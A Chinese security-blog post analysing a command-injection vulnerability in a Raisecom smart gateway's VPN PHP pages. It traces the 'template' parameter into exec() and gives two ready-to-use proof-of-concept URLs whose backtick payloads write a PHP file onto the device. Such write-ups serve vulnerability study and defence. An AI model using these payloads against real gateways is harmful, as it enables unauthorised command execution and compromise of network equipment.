瑞斯康达智能网关命令执行漏洞简单分析
瑞斯康达智能网关命令执行漏洞简单分析
黑白之道 2025-01-29 14:24
漏洞分析
今年看到这个厂商的设备又爆漏洞了,一起分析下这个命令执行漏洞
我们先根据网上的文章定位漏洞文件 list_base_config.php
image-20241231103058916
这里看到可以传入几个参数 type parts pages serch_value,我们往下看这个switch分支的判断条件,想要调用sslvpn_config_mod这个方法的话我们需要按照条件构造参数到这里参数应该是
parts=base_config&type=mod
我们进入到这个方法中,看到了几个exec函数,不过没找到上述传入的 $config_type = 2;在哪,没关系我们直接看这个朴实无华的命令拼接
image-20241231105423075
这里发现传入两个参数都可触发命令拼接我们选择 template 进行传参并带入exec函数执行,
template=`echo+-e+'<?php phpinfo();>'>/www/tmp/phpinfo.php`
那么到这里我们的完整poc应该就是
http://127.0.0.1/vpn/list_base_config.php?parts=base_config&type=mod&template=`echo+-e+'<?php phpinfo();?>'>/www/tmp/phpinfo.php`
image-20241231110849770
梅开二度
这里我们查看这个方法的调用还有以下几个文件
image-20241231111504917
随便看一个其他的 list_ip_network.php
image-20241231111545946
这里需要满足传参 Nradius_submit为ture的情况下即可,所以poc为
/vpn/list_ip_network.php?Nradius_submit=1&template=`echo+-e+'<?php phpinfo();?>'>/www/tmp/info.php`
image-20241231111949083
文章来源:狐狸说安全
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END